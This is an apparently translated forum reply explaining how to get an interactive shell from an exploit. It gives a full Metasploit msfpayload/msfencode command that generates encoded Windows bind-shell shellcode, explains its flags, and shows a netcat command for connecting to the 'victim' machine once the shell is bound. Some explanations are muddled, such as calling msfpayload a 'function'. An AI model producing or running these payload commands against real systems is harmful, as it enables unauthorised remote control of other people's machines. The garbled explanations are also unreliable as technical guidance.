Yes, I understand what you mean, but I believe that you are making one fundamental mistake. You invoke the interactive shell without binding it.
This is similar to calling the ifconfig command. If you want to execute one command, then your shell code is fine, however, if you want an interactive shell, you cannot just run sh.
Just running sh will cause the shell to execute; it will not give you interactive shell control.
Solution: Use the shell code generator to create a tcp reverse shell or a binding shell, and use this as a payload for your exploit.
If you are trying to do this in Metasploit, then here is an example of the command you want.
msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/alpha_mixed -b '\x00' -tc
- Msfpayload is the name of the function. windows / shell_bind_tcp - this is to use the path
- LPORT is the port on which the remote victim machine will have an accessible shell
- R for raw output
- Then we pass this to msfencode, since we need it to be C executable code, and this needs to be compiled for this architecture
- -e indicates the encoding type and architecture for support, for example, for Win Sp2
- -b indicates bytes that you cannot use in shell code. For example, 00 is the end of a string byte
- -t is the output type, like C code.
Study a little more and play and you will get it. In fact, it is much more difficult to get an interactive shell compared to executing a static command.
After execution, you can use a program such as netcat to connect and use the shell.
netcat.exe -nv <victim ip> <port where shell was bound to>
I hope this was the right decision.